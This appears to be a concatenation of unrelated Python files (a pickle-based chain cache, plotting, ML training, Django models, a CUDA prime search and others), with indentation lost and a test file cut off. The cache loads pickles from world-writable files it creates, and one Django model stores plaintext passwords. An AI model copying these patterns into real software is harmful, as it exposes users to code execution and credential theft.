print("\t"*level+"level: {}, items: {}".format(level, items))
for attribute, value in items:
try:
if debug_level == 2:
print("\t" * level + "level: {}, attribute: {}".format(level, attribute))
try:
add_string = self._object_dump_to_string(attribute, max_recursion_level, level + 1, debug_level)
except:
add_string = self.pickle(attribute)
dump_string += add_string
except pickle.PicklingError: # attribute could not be dumped
pass
try:
if debug_level == 2:
print("\t" * level + "level: {}, value: {}".format(level, value))
try:
add_string = self._object_dump_to_string(value, max_recursion_level, level + 1, debug_level)
except:
add_string = self.pickle(value)
dump_string += add_string
except pickle.PicklingError: # attribute could not be dumped
pass
if debug_level > 0 and level == 0:
print("dump_string is {}\n"
"Compare this with another cache hash with command\n"
" $ cmp -bl <(echo -n abcda) <(echo -n aqcde)".format(hashlib.sha256(six.binary_type().join([dump_string])).hexdigest()))
return dump_string
class PickleCache(Chain, ObjectDumper):
"""
Caches the data processed by the given chain. Cached data are stored in the given directory as pickle files.
    File names are the hash of data.id and chain hash.
"""
def __init__(self, directory, data_key="id", chain=None, force=False,
max_recursion_level=10, dir_rights=0o777, debug_level=0, save_cache=True):
"""
:param directory:
:param data_key:
:param chain:
:param boolean force: if True then will not read the cache
:param max_recursion_level:
:param dir_rights:
:param int debug_level:
        :param boolean save_cache: if True then will dump the cache
"""
super(PickleCache, self).__init__(chain)
self.directory = directory
self.force = force
self.data_key = data_key
self.max_recursion_level = max_recursion_level
self.debug_level = debug_level
self.chain_info = {'chain_len': 0, 'chain_hash': None,
'chain_mtime': None,
'chain_repr': None}
self.save_cache = save_cache
# update chain info
if chain is not None:
self.hash_chain()
if not os.path.exists(directory):
# Override umask settings to enforce flexible rights. 777 enables collaboration between people and prevents
# omnipresent AccessDeniedErrors.
original_umask = None
try:
original_umask = os.umask(0)
os.makedirs(directory, dir_rights)
finally:
if original_umask is not None:
os.umask(original_umask)
def step(self, data):
# TODO write step method or get rid of step altogether, as Inspector is not much used
pass
def get_cache_file_from_id(self, data_id):
key = hashlib.sha256(self.pickle(data_id)).hexdigest()
return self.directory + "/" + key + self.chain_info['chain_hash']
def get_cache_file(self, data):
key = hashlib.sha256(self.pickle(data[self.data_key])).hexdigest()
chain_hash = self.chain_info['chain_hash']
return self.directory + "/" + key + chain_hash
def check_cache_exists(self, data):
"""
:type data: dict
:rtype: bool
"""
file = self.get_cache_file(data)
log.debug("Cache: {}".format(file))
return os.path.exists(file)
@staticmethod
def hash_dump_string(dump_string):
"""
        Take a dump byte-string and create a sha256 hash.
:param dump_string:
:return string:
"""
return hashlib.sha256(six.binary_type().join([dump_string])).hexdigest()
def _get_chain_hash(self, chain):
"""Create a unique hash for each chain configuration.
It takes into account values of inner attributes of each object.
:param chain: list of modules
:return: string
"""
# todo if like this then PickleCache(m1, m2) + PickleCache(m3) != PickleCache(m1, m2, m3)
chain_string = self._object_dump_to_string(chain, self.max_recursion_level, debug_level=self.debug_level)
return self.hash_dump_string(chain_string)
def _get_object_mtime(self, obj):
"""Extract mtime from object's source file.
:param obj: Object instance
:return: float Time of the last modification of the source file on an object
"""
try:
mtime = os.path.getmtime(inspect.getsourcefile(obj.__class__))
except (TypeError, OSError):
mtime = 0.
return mtime
def _get_chain_mtime(self, chain):
"""Count time of the last modification of each module and returns their maximum.
:param chain: list of modules
:return: float
"""
chain_mtimes = [0.] # default time in case no other time is obtained
for module in chain:
if isinstance(module, collections.Iterable): # module is a chain
chain_mtimes.append(self._get_chain_mtime(module))
elif hasattr(module, 'process'): # module is an object
chain_mtimes.append(self._get_object_mtime(module))
else: # module is a function
# no time is obtained because the function may be in the main file and its mtime might be undesirable
pass
return max(chain_mtimes)
def _get_chain_repr(self, chain):
"""Concatenate string representations of all modules in the chain.
:param chain: list of modules
:return: string
"""
chain_repr = []
for module in chain:
if isinstance(module, collections.Iterable): # module is a chain
chain_repr.append(self._get_chain_repr(module))
elif hasattr(module, 'process'): # module is an object
chain_repr.extend(
(str(module.__class__), repr(vars(module))))
else: # module is a function
if isinstance(module, partial): # partial function
chain_repr.extend((str(module.__class__), repr(module.func),
repr(module.keywords)))
else:
chain_repr.append(repr(module))
return ' '.join(chain_repr)
def _process(self, data, cache):
"""Process data and puts them to structure for caching.
:param data: dict
:param cache: dict Caching structure
:return: (dict, bool)
"""
stop = False
try:
super(PickleCache, self).process(data)
except StopIteration:
stop = True
data_to_save = data
cache = dict() if cache is None else cache
cache[self.chain_info['chain_hash']] = {"data": data_to_save,
"stopped": stop,
'chain_repr': self.chain_info[
'chain_repr'],
'chain_mtime': self.chain_info[
'chain_mtime']}
return cache, stop
def _check_time_consistency(self, cache_mtime, chain_mtime):
"""Check whether modification times correspond.
:param cache_mtime: float Modification time of modules by which cached data were processed
:param chain_mtime: float Modification time of modules in chain
"""
if cache_mtime != chain_mtime:
log.warn("""Modification times do not correspond.
Last change of chain: {}
Last change in cache: {}""".format(time.ctime(chain_mtime),
time.ctime(cache_mtime)))
def hash_chain(self):
"""Hash the chain in order to use the hash as a dictionary key."""
if len(self.modules) != self.chain_info['chain_len']:
self.chain_info = {
'chain_len': len(self.modules),
'chain_mtime': self._get_chain_mtime(self.modules),
'chain_hash': self._get_chain_hash(self.modules),
'chain_repr': self._get_chain_repr(self.modules),
}
@property
def chain_hash(self):
"""Return chain_hash of the current chain."""
return self.chain_info['chain_hash']
def process(self, data):
"""
Checks if there is cached data. If so, returns it, otherwise runs the chain and stores the processed data.
:type data: dict
:return:
"""
file = self.get_cache_file(data)
loaded = False
if self.check_cache_exists(data):
if self.force:
log.info("Item found in cache but force=True")
else:
try:
log.info("Found in cache, skipping chain")
with open(file, 'rb') as f:
# https://stackoverflow.com/questions/2766685/how-can-i-speed-up-unpickling-large-objects-if-i-have-plenty-of-ram/36699998#36699998
# disable garbage collector for speedup unpickling
gc.disable()
cache = pickle.load(f)
# enable garbage collector again
gc.enable()
retrieved_data = cache['data']
stop = cache["stopped"]
if stop:
raise StopIteration()
self._check_time_consistency(cache['chain_mtime'],
self.chain_info['chain_mtime'])
for key, value in retrieved_data.items():
data[key] = value
loaded = True
except EOFError:
log.warning(
"Failed to load cache item {} (corrupted file will be deleted)".format(file))
os.unlink(file)
if not loaded:
log.debug("Not found in cache, processing chain")
cache, stop = self._process(data, {})
cache = cache[self.chain_info['chain_hash']]
if self.save_cache:
with open(file, 'wb') as f:
try:
pickle.dump(cache, f, protocol=HIGHEST_PROTOCOL)
except:
pickle.dump(cache, f)
# Try to set some more flexible access rights
try:
os.chmod(file, RWRWRW)
except OSError:
pass
def close(self):
"""Close cache and chain."""
super(PickleCache, self).close()
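# A minimal usage sketch of PickleCache (assumptions: ``Tokenize`` is a hypothetical
# flexp-style module exposing ``process(data)``, and ``data`` is a dict carrying the
# ``id`` key used as the cache key):
#
#     cache = PickleCache("cache_dir", data_key="id", chain=[Tokenize()])
#     data = {"id": "doc-1", "text": "hello world"}
#     cache.process(data)   # first call runs the chain and writes a pickle to cache_dir
#     cache.process(data)   # an identical call is answered from the cache
#     cache.close()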
|
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from matplotlib import rcParams
rcParams["font.size"] = 15
dat = pd.read_json("4d_plot_data.json")
xs = dat["n_features"]
ys = dat["n_est"]
zs = dat["mae"]
cs = dat["max_depth"]
xs2 = xs.unique()
ys2 = ys.unique()
xticks = [0.05] + list(np.linspace(0.2, 1, 5))
# normalisation
alpha = ((zs-zs.min())/(zs.max()-zs.min()))
# colour array
rgba_colors = np.zeros((zs.shape[0], 4))
rgba_colors[:, 2] = 1.0
rgba_colors[:, 3] = alpha
# fig, ax = plt.subplots(figsize=(25,15))
# ax.scatter(zs, alpha)
# ax.set(xlabel="mean absolute error",
# ylabel="normalised")
# plt.tight_layout()
# plt.show()
# power = 5
# fig, ax = plt.subplots(1,2, figsize=(25, 15))
# ax[0].scatter(zs, alpha)
# ax[1].scatter(zs, alpha**power)
# ax[0].set(xlabel="mean absolute error",
# ylabel="normalised")
# ax[1].set(xlabel="mean absolute error",
# ylabel=f"normalised^{power}")
# plt.tight_layout()
# plt.show()
rgba_colors[:, 3] = alpha**5
fig, ax = plt.subplots(figsize=(25, 15), subplot_kw={"projection": "3d"})
ax.scatter(xs, ys, cs,
c=rgba_colors,
s=alpha**5*100,
marker=".")
ax.scatter(1, 100, 3, marker="v", c="r", s=100)
ax.set(ylabel="n_estimators",
xlabel="n_features",
zlabel="max_depth",
zticks=cs.unique(),
zlim=(3, 6),
xticks=xticks,
)
ax.set_title("4-th dimension size and transparency\nthe power of power")
plt.tight_layout()
plt.show()
|
from .books.list import book_list
from .librarians.list import list_librarians
from .libraries.list import list_library
from .home import home
from .auth.logout import logout_user
from .libraries.form import library_form, library_edit_form
from .books.details import book_details
from .libraries.details import library_details
from .books.form import book_form, book_edit_form
# from .librarians.details import librarian_details
# from .librarians.form import librarian_form
|
from Observation import Observation
class SyntheticObservation(Observation):
def __init__(self):
Observation.__init__(self)
self.schema = None
self.schema_var = None
self.successful_var = None
self.successful = False
def equals(self, o2):
        if type(self) != type(o2):
            return False
        if self.schema is None:
            return False
        return self.schema.equals(o2.schema) and self.successful == o2.successful
def copy(self):
so = SyntheticObservation()
so.schema = self.schema.copy()
so.successful = self.successful
so.sensor_id = self.sensor_id
return so
def get_properties(self):
props = {}
if (self.schema_var != None):
props["schema"] = self.schema_var
else:
props["schema"] = self.schema.id.to_string()
if (self.successful_var != None):
props["successful"] = self.successful_var
else:
props["successful"] = self. successful.to_string()
return props;
def get_concrete_properties(self):
props = {}
props["schema"] = self.schema.id.to_string()
props["successful"] = self.successful.to_string()
return props
def set_property_var(self, property, variable):
if property == "schema":
self.schema_var = variable
if property == "successful":
self.successful_var = variable
|
import pickle
import numpy as np
import tensorflow as tf
import tensorflow.keras as kr
import Configuration as cfg
def load_char_to_index(char_to_index_path):
with open(char_to_index_path, 'rb') as char_to_index_file:
return pickle.load(char_to_index_file)
def save_char_to_index(char_to_index, char_to_index_path):
with open(char_to_index_path, 'wb') as char_to_index_file:
pickle.dump(char_to_index, char_to_index_file, protocol=pickle.HIGHEST_PROTOCOL)
def load_train_data(train_data_path):
train_data_file = open(train_data_path, 'r')
train_data_text = train_data_file.read()
train_data_file.close()
train_data_text = train_data_text.lower().replace('\r', '').replace('\n', ' ')
char_list = sorted(list(set(train_data_text)))
char_count = len(char_list) + 1
char_to_index = dict((char, index + 1) for index, char in enumerate(char_list))
encoded_train_data_text = [char_to_index[char] for char in train_data_text]
sequence_list = list()
for pos in range(cfg.max_sequence_len + 1, len(encoded_train_data_text)):
encoded = encoded_train_data_text[pos - (cfg.max_sequence_len + 1):pos]
for i in range(1, len(encoded)):
sequence_list.append(encoded[:i + 1])
sequence_list = kr.preprocessing.sequence.pad_sequences(sequence_list, maxlen=cfg.max_sequence_len + 1, padding='pre', truncating='pre')
sequence_list = np.array(sequence_list)
train_text = kr.utils.to_categorical(sequence_list[:, :-1], num_classes=char_count)
train_label = kr.utils.to_categorical(sequence_list[:, -1], num_classes=char_count)
return char_to_index, char_count, train_text, train_label
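# Worked example of the sequence construction above (a sketch, assuming
# cfg.max_sequence_len == 3 and the lower-cased text "abcde" encoded as [1, 2, 3, 4, 5]):
# the only window is encoded_train_data_text[0:4] == [1, 2, 3, 4], which yields the
# prefixes [1, 2], [1, 2, 3] and [1, 2, 3, 4]. After 'pre'-padding each row to length
# cfg.max_sequence_len + 1, the last column becomes the one-hot label and the
# remaining columns become the one-hot encoded input.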
|
from __future__ import print_function, division
import numpy as np
from timeit import default_timer as timer
from numbapro import cuda
from thread import start_new_thread
@cuda.jit('uint64(uint64, uint64, uint64)', inline=True, device=True)
def modexp(base, exponent, p):
"""
    iterative modular exponentiation
:param base:
:param exponent:
:param p:
:return:
"""
result = 1
base = base % p
while exponent > 0:
if exponent % 2 == 1:
result = (result*base) % p
exponent = exponent >> 1
base = (base*base) % p
return result
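# Worked example (plain Python, off the GPU): modexp(2, 10, 1000) == 24, since
# 2**10 = 1024 and 1024 % 1000 == 24. The Wieferich kernel below applies this with
# base 2, exponent ac - 1 and modulus ac**2, i.e. it tests 2**(ac - 1) % ac**2 == 1.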
@cuda.jit('void(uint64[:], uint64[:])', target='gpu')
def wieferich(check, result):
"""
checks if a given number is a wieferich prime
:param check: list of numbers to check
:param result: list of wieferich numbers (or 0)
:return:
"""
#current index
i = cuda.grid(1)
ac = check[i]
#modexp params
m = 2
e = ac-1
n = ac**2
if modexp(m, e, n) == 1:
result[0] = ac
@cuda.jit('void(uint64[:], uint64[:])', target='gpu')
def fermat_wieferich(check, result):
"""
    checks whether a given number passes the base-2 Fermat test and, if so, the Wieferich condition
    :param check: list of numbers to check
    :param result: list of numbers passing both checks (or 0)
:return:
"""
#current index
i = cuda.grid(1)
ac = check[i]
#params for fermat-check
m = 2
e = ac-1
n = ac
#if fermat run wieferich-check
if modexp(m, e, n) == 1:
n = ac**2
if modexp(m, e, n) == 1:
result[i] = ac
def main():
RUNS = 100000
time_deltas = []
BLOCKS = 50000
THREADSPERBLOCK = 256
SIZE = BLOCKS * THREADSPERBLOCK
wieferichs = []
overall_timer_start = timer()
for i in range(RUNS):
start = 6700000000000001 + (i * SIZE)
if i % 500 == 0:
print (str(i) + "th Run, checking from " + str(start) + " to " + str(start+SIZE))
check = create_list(start, SIZE)
#result = np.zeros(SIZE, dtype=np.uint64)
result = np.zeros(1, dtype=np.uint64)
start_time = timer()
wieferich[BLOCKS, THREADSPERBLOCK](check, result)
needed_time = timer() - start_time
time_deltas.append(needed_time)
#print ("%f seconds" % needed_time)
#start threaded result processing
start_new_thread(proc_result,(result[0], start))
#proc_result(result, i)
#print(result)
time_in_seconds = timer() - overall_timer_start
import datetime
execution_delta = str(datetime.timedelta(seconds=time_in_seconds))
print("time: " + execution_delta + " for %d numbers" % ((SIZE*RUNS)))
print (datetime.datetime.today())
# save times to file
f = open('time.txt', 'a')
for item in time_deltas:
print(str(item), file=f)
f.close()
import matplotlib.pyplot as plt
plt.title("Execution per block")
plt.xlabel("xth block (" + str(SIZE) + " numbers per block)")
plt.ylabel("execution time in seconds")
plt.plot(time_deltas)
#plt.savefig("overnight.png")
#plt.show()
def create_list(start, size):
"""
creates a np list of odd numbers
:param start: start of list
:param size: size of list
:return: list
"""
if start % 2 != 1:
start += 1
list = np.arange(start, start+size*2, 2, dtype=np.uint64)
return list
def proc_result(result, start):
"""
process results -> needs to be threaded properly
:param result: result to be processed
:param name: thread count
:return:
"""
if result == 0:
return
print(result)
f = open('wieferichs.txt', 'a')
print(str(result) + " in range from " + str(start), file=f)
f.close()
if __name__ == '__main__':
main()
#from profiling import test
#test()
|
import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
# Here the underlying function is assumed to be y = 3x + 2
x_data = [1.0,2.0,3.0]
y_data = [5.0,8.0,11.0]
def forward(x):
return x * w + b
def loss(x,y):
y_pred = forward(x)
return (y_pred-y)*(y_pred-y)
mse_list = []
W=np.arange(0.0,4.1,0.1)
B=np.arange(0.0,4.1,0.1)
[w,b]=np.meshgrid(W,B)
l_sum = 0
for x_val, y_val in zip(x_data, y_data):
y_pred_val = forward(x_val)
print(y_pred_val)
loss_val = loss(x_val, y_val)
l_sum += loss_val
fig = plt.figure()
ax = Axes3D(fig)
ax.plot_surface(w, b, l_sum/3)
plt.show()
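# Sanity check (a sketch): the data above is generated from y = 3x + 2, so the averaged
# loss surface l_sum/3 should reach its minimum (zero) at the grid point w = 3, b = 2.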
|
from collections.abc import Iterable
def _flatten(l,ret):
for i in l:
if isinstance(i, Iterable) and type(i) is not str:
_flatten(i,ret)
else:
ret.append(i)
return ret
def flatten(l):
ret = []
return list(_flatten(l,ret))
if __name__ == "__main__":
inp = [1, [2, 3], [4, 5, [6, 7, [8, 9, 10]]]]
inp2 = ['a', 'b', [1, 2, 3],
['c', 'd', ['e', 'f', ['g', 'h']]],
[4, [5, 6, [7, [8]]]]]
inp3 = [1, (2, 3), [(4, 5), [6, 7, [8, 9, 10]]]]
print(list(flatten(inp)))
print(list(flatten(inp2)))
print(list(flatten(inp3)))
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models
# Create your models here.
# 1. Image table
class Image(models.Model):
imageId = models.AutoField(primary_key=True)
url = models.CharField(max_length=100)
img = models.FileField(upload_to="picture")
# 2. Column (section) table
class Column(models.Model):
columnId = models.AutoField(primary_key=True)
parentColum = models.CharField(max_length=50, null=True)
sort = models.IntegerField()
level = models.IntegerField()
name = models.CharField(max_length=50)
is_use = models.BooleanField(default=True)
imageId = models.ForeignKey(Image, db_column="imageId")
class Meta:
ordering = ['sort']
# 3. Department table
class Department(models.Model):
departmentId = models.AutoField(primary_key=True)
name = models.CharField(max_length=50)
# 4. News table
class News(models.Model):
newsId = models.AutoField(primary_key=True)
title = models.CharField(max_length=50)
create_date = models.DateField()
upload_date = models.DateField(null=True)
text = models.TextField()
writer = models.CharField(max_length=50)
    is_stick = models.BooleanField(default=False)  # whether the news item is pinned to the top
imageId = models.ForeignKey(Image, db_column="imageId")
columnId = models.ForeignKey(Column, db_column="columnId")
departmentId = models.ForeignKey(Department, db_column="departmentId")
# 5. Administrators table
class Administrators(models.Model):
username = models.CharField(max_length=20, primary_key=True)
name = models.CharField(max_length=50, null=True)
password = models.CharField(max_length=20)
departmentId = models.ForeignKey(Department, db_column="departmentId")
level = models.IntegerField(null=True)
is_use = models.BooleanField(default=True)
|
class Demo4:
#static variable
name = "Sathya"
@classmethod
def sample(cls):
#Calling static variable using class name
print(Demo4.name)
#static variable is available for class
print(cls.name)
@classmethod
def sample2(cls):
Demo4.name = "Sathya Tech"
print(Demo4.name)
cls.name = "Sathya Tech AMPT"
print(cls.name)
#----------------------
print("Before Calling Functions -- ",Demo4.name)
Demo4.sample()# sathya sathya
Demo4.sample2()
print("After Calling Functions -- ",Demo4.name)
#---------------------
Demo4().sample()
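# Expected output of the calls above (a sketch): the first print shows "Sathya";
# sample() prints "Sathya" twice; sample2() prints "Sathya Tech" and then
# "Sathya Tech AMPT" (cls is Demo4, so both assignments change the same class
# attribute); the final prints and Demo4().sample() therefore show "Sathya Tech AMPT".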
|
import os
try:
from __revision__ import __revision__
except ImportError:
__revision__ = 'develop'
metadata = {
'name': "djopenid",
'version': "1.0",
'release': __revision__,
'url': 'http://www.jollydream.com',
'author': 'hanbox',
'author_email': 'han.mdarien@gmail.com',
'admin': 'han.mdarien@gmail.com',
'dependencies': (
'python-openid',
'boto',
'South',
'django-extensions',
),
'description': 'Jollydream Inc',
'license': 'Private',
}
|
# Generated by Django 2.2.1 on 2019-09-22 14:24
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('myapp', '0005_auto_20190914_2336'),
]
operations = [
migrations.CreateModel(
name='Education',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('head_image', models.ImageField(default='bandup/media/default.jpg', upload_to='profile_pics')),
('teacher_name', models.CharField(max_length=100)),
('years_of_playing', models.CharField(max_length=100)),
('course_content', models.CharField(max_length=5000)),
('charging_fee', models.CharField(max_length=100)),
],
),
]
|
from flask_script import Manager
from movie import app, db, Director, Movie
manager = Manager(app)
# reset the database and create some initial data
@manager.command
def deploy():
db.drop_all()
db.create_all()
StevenSpielberg = Director(name='Steven Spielberg', about='Steven Spielberg is an American filmmaker and the highest grossing filmmaker of all time')
RyanCoogler = Director(name='Ryan Coogler', about='Ryan Coogler is an up and coming director known for his movies Creed and Black Panther')
JJAbrams = Director(name='JJ Abrams', about='JJ Abrams is a director well known for his Star Trek and Star Wars movies')
movie1 = Movie(name='Jurassic Park', year=1993, ratings="IMDb: 8.1, Rotten Tomatoes: 92%", director=StevenSpielberg)
movie2 = Movie(name='BlackPanther', year=2018, ratings="IMDb: 7.6, Rotten Tomatoes: 97%", director=RyanCoogler)
movie3 = Movie(name='Star Wars: The Force Awakens', year=2015, ratings="IMDb: 8, Rotten Tomatoes: 93%", director=JJAbrams)
db.session.add(StevenSpielberg)
db.session.add(RyanCoogler)
db.session.add(JJAbrams)
db.session.add(movie1)
db.session.add(movie2)
db.session.add(movie3)
db.session.commit()
if __name__ == "__main__":
manager.run()
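# Usage sketch (assuming this file is saved as manage.py):
#     python manage.py deploy      # reset the database and seed the sample data
# Flask-Script's Manager also exposes its built-in commands (e.g. runserver) via manager.run().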
|
# lec4[Multiple feature Linear Regression]
import tensorflow as tf
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
## function ##
def standard(x):
global memoryList
memoryList.append((np.mean(x), np.std(x)))
return (x - np.mean(x)) / np.std(x)
def rollback(x, num):
mean, std = memoryList[num][0], memoryList[num][1]
return x * std + mean
## Variable ##
data = pd.read_csv("d:/data/ex01/ex1data2.txt", encoding='utf-8', sep=',', header=None)
memoryList = []
m = len(data)  # 46 --> number of data points
x1_org = data.loc[:, 0]  # x1 axis
x1_scale = standard(x1_org)  # scale x1
x2_org = data.loc[:, 1]  # x2 axis
x2_scale = standard(x2_org)  # scale x2
y = data.iloc[:, -1]  # y axis (price)
y = standard(y)  # reshape is important
learning_rate = 0.01
iteration = 1500
## x, y placeholder ##
x1= tf.placeholder(tf.float32)
x2= tf.placeholder(tf.float32)
Y= tf.placeholder(tf.float32)
## W, b, hypothesis setup --> H(x) = Wx + b ##
w1 = tf.Variable(tf.random_normal([1]), name='weight1')
w2 = tf.Variable(tf.random_normal([1]), name='weight2')
b = tf.Variable(tf.random_normal([1]), name='bias')
hypothesis = x1 * w1 + x2 * w2 + b
## cost and gradient descent ##
cost = tf.reduce_mean(tf.square(hypothesis-Y))  # error --> (h(x) - y)
optimizer = tf.train.GradientDescentOptimizer(learning_rate=learning_rate)
## execution phase ##
train = optimizer.minimize(cost)
sess = tf.Session() # session open
sess.run(tf.global_variables_initializer())  # initialize variables
costList = []
costdf = pd.DataFrame(costList)
for step in range(iteration):
cost_val, hy_val, _, w1_val, w2_val, b_val = sess.run([cost, hypothesis, train, w1, w2, b], feed_dict={x1: x1_scale, x2: x2_scale, Y:y})
costList.append(cost_val)
costdf[learning_rate] = costList
## cost graph ##
plt.plot(costdf[learning_rate], 'r-')
plt.show()
## fitted-line graph ## since the 3D data is drawn in 2D, the plot shows several overlapping shapes
X = pd.DataFrame([x1_scale,x2_scale]).T
plt.plot(X, y, 'rx', markersize=10)
plt.plot(X[0], hy_val, 'b-')
plt.show()
predict = [(1650.-memoryList[0][0])/memoryList[0][1], (3-memoryList[1][0])/memoryList[1][1]]
y_hat = rollback(predict[0] * w1_val + predict[1] * w2_val + b_val, 2)
y_hat
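# Note on the prediction above: memoryList stores (mean, std) in the order standard()
# was called (index 0: x1, index 1: x2, index 2: y), so rollback(..., 2) maps the
# standardized prediction back onto the original price scale.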
sess.close()
|
import torch
import torch.backends.cudnn as cudnn
import torch.nn as nn
import torch.optim as optim
import argparse
import os
import numpy as np
from tensorboardX import SummaryWriter
from Resnet18 import Resnet_18
from Dataloader import Load_Cifar10
from Visualization import Filter_visualization, Featuremap_visualization
import warnings
warnings.filterwarnings("ignore")
# Parameters setting
parser = argparse.ArgumentParser(description='Train/Test Resnet18 based on Cifar-10 with Pytorch')
parser.add_argument('--gpu', type=bool, default=torch.cuda.is_available(), help='gpu or cpu')
parser.add_argument('--lr', type=float, default=0.001, help='Initial learning rate')
parser.add_argument('--batch_size', type=int, default=100, help='batch size for train and test')
parser.add_argument('--num_epoch', type=int, default=20, help='Epoch Times of training')
parser.add_argument('--checkpoint_path', type=str, default='./check_point/', help='Path to save model')
parser.add_argument('--log_path', type=str, default='./qiuke/', help='Path to save tensorboardX')
parser.add_argument('--visual_path', type=str, default='./Visualization/', help='Path to save Filter/Featuremap Visualization')
args = parser.parse_args()
# Essential information of Cifar10
CLASSES = ('plane', 'car', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck')
def train(epoch):
model.train()
sum_loss = 0.0
correct_num = 0
total_num = 0
acc = 0
for batch_num, (train_data, label) in enumerate(train_loader):
train_data, label = train_data.to(device), label.to(device)
optimizer.zero_grad()
# run a batch
result = model(train_data)
loss = loss_function(result, label)
loss.backward()
optimizer.step()
# calculate Acc and Loss
sum_loss += loss.item()
# print(result)
_, predicted = torch.max(result, 1)
# print(predicted)
total_num += label.size(0)
# print(label.size(0))
correct_num += np.sum(predicted.cpu().numpy() == label.cpu().numpy())
acc = 100. * correct_num/total_num
# print for each batch
step_in_a_epoch = len(train_loader)
trained_step = 1 + step_in_a_epoch * epoch + batch_num
total_step = step_in_a_epoch * args.num_epoch
trained_num = batch_num * args.batch_size + len(train_data)
# total_sam = len(train_loader.dataset)
# loss.item Correspond to current batch loss;
# sum_loss/(batch_num+1) Correspond to the average batch loss in current epoch
print('Epoch:{}/{} Step:{}/{} Trained_num:{}/{} Train_Loss:{:0.4f} Avg_loss:{:0.4f} lr:{:0.5f} Acc:{:0.3f}%'.format(
epoch+1, args.num_epoch,
trained_step, total_step,
trained_num, len(train_loader.dataset),
loss.item(), sum_loss/(batch_num+1),
optimizer.param_groups[0]['lr'], acc))
# record for tensorboard
#writer.add_scalar('Train_loss', loss.item(), global_step=trained_step)
writer.add_scalar('Train_Accuracy', acc, global_step=trained_step)
writer.add_scalars('Train_loss', {'Train_Loss': loss.item(), 'Avg_loss': sum_loss/(batch_num+1)}, global_step=trained_step)
return step_in_a_epoch, sum_loss/step_in_a_epoch, acc
def Test(epoch):
# BN won't be changed
model.eval()
sum_loss = 0.0
correct_num = 0
total_num = 0
# don't calculate grad
with torch.no_grad():
        # iterate over batches of test data
for batch_num, (test_data, label) in enumerate(test_loader):
test_data, label = test_data.to(device), label.to(device)
result = model(test_data)
loss = loss_function(result, label)
# calculate Acc and Loss
sum_loss += loss.item()
_, predicted = result.max(1)
total_num += label.size(0)
correct_num += np.sum(predicted.cpu().numpy() == label.cpu().numpy())
test_acc = 100. * correct_num/total_num
test_loss = sum_loss/len(test_loader)
print('Epoch:{epoch}/{total_epoch} Test_Loss:{:0.4f} Test_Acc:{:0.4f}%'.format(
test_loss, test_acc, epoch=epoch+1, total_epoch=args.num_epoch))
# record for tensorboard
writer.add_scalar('Test_loss', test_loss, epoch)
writer.add_scalar('Test_Accuracy', test_acc, epoch)
return test_loss, test_acc
if __name__ == '__main__':
    # choose gpu or cpu
if args.gpu:
device = torch.device('cuda')
cudnn.benchmark = True
else:
device = torch.device('cpu')
# Load_Cifar10()
train_loader, test_loader = Load_Cifar10(args.batch_size)
# Load Resnet_18
model = Resnet_18().to(device)
# define lr,loss_f, optimizer
loss_function = nn.CrossEntropyLoss().to(device)
optimizer = optim.Adam(model.parameters(), lr=args.lr)
scheduler = optim.lr_scheduler.MultiStepLR(optimizer, milestones=[10, 15, 18], gamma=0.4)
# warmup_scheduler = WarmUpLR(optimizer, iter_per_epoch * args.warm)
# prepare for tensorboard
writer = SummaryWriter(log_dir=args.log_path)
# Train and Test
print("start train!")
best_Acc = 80
Train_Loss = 0.0
Train_Acc = 0.0
Test_Loss = 0.0
Test_Acc = 0.0
for epoch in range(args.num_epoch):
# Train/Test per epoch
step_per_epoch, Train_Loss, Train_Acc = train(epoch)
scheduler.step(epoch)
Test_Loss, Test_Acc = Test(epoch)
# record for tensorboardX
writer.add_scalars('Contrast on Loss', {'Train_Loss': Train_Loss, 'Test_Loss': Test_Loss}, epoch)
        writer.add_scalars('Contrast on Accuracy', {'Train_Acc': Train_Acc, 'Test_Acc': Test_Acc}, epoch)
# check checkpoint
if not os.path.exists(args.checkpoint_path):
os.makedirs(args.checkpoint_path)
        # choose model to save
current_step = step_per_epoch * (epoch + 1)
if (epoch + 1) == args.num_epoch:
torch.save(model, args.checkpoint_path + 'Resnet18_step{step}.pth'.format(step=current_step))
if Test_Acc > best_Acc and epoch > 0.75 * args.num_epoch:
best_Acc = Test_Acc
torch.save(model, args.checkpoint_path + 'Resnet18_step{step}_better.pth'.format(step=current_step))
# Filter visualization based on Plot and Torchvision
Filter_visualization(model, args.log_path, args.visual_path, current_step)
# Featuremap visualization based on Reverse_Resnet18
Featuremap_visualization(model, args.visual_path)
print('Featuremap Visualization Succeeded!')
print('done! Best accuracy = {:.2f}%'.format(best_Acc))
print("Hi~ Here are some warnings that don't affect the results\n Because I use PLT to draw single channel images.")
writer.export_scalars_to_json("./tensorboardX.json")
writer.close()
|
import gspread
from oauth2client.service_account import ServiceAccountCredentials
import re
class FormReader:
def fetch_sheet(self, url):
all_list = self.get_data(url)
student_links = {}
all_list = all_list[1:]
for i in range(len(all_list)):
if ',' in all_list[i][0]:
student_tuple_list = (str(all_list[i][0])).split(',')
student_tuple = tuple(i for i in student_tuple_list)
student_links[student_tuple] = all_list[i][1]
else:
student_tuple = (all_list[i][0],)
student_links[student_tuple] = all_list[i][1]
return student_links
def get_data(self, url):
scope = ['https://spreadsheets.google.com/feeds']
creds = ServiceAccountCredentials.from_json_keyfile_name('client_secret.json', scope)
client = gspread.authorize(creds)
sh = client.open_by_url(str(url))
worksheet = sh.get_worksheet(0)
all_list = worksheet.get_all_values()
return all_list
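# A minimal usage sketch (the spreadsheet URL is a placeholder and 'client_secret.json'
# must hold valid Google service-account credentials):
#
#     reader = FormReader()
#     links = reader.fetch_sheet("https://docs.google.com/spreadsheets/d/<sheet-id>")
#     # links maps tuples of student names to the submitted link, e.g.
#     # {("alice", "bob"): "https://github.com/..."}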
|
loop = 5
while(loop <= 10):
print(loop)
loop += 1
print('Loop Ends')
print(loop)
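# Expected output: 5, 6, 7, 8, 9, 10 (one per line), then 'Loop Ends', then 11.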
|
"""
Unit tests for the load balancer API mock.
"""
from __future__ import absolute_import, division, unicode_literals
import json
import treq
from twisted.trial.unittest import SynchronousTestCase
from mimic.canned_responses.loadbalancer import load_balancer_example
from mimic.model.clb_errors import (
considered_immutable_error,
invalid_json_schema,
loadbalancer_not_found,
node_not_found,
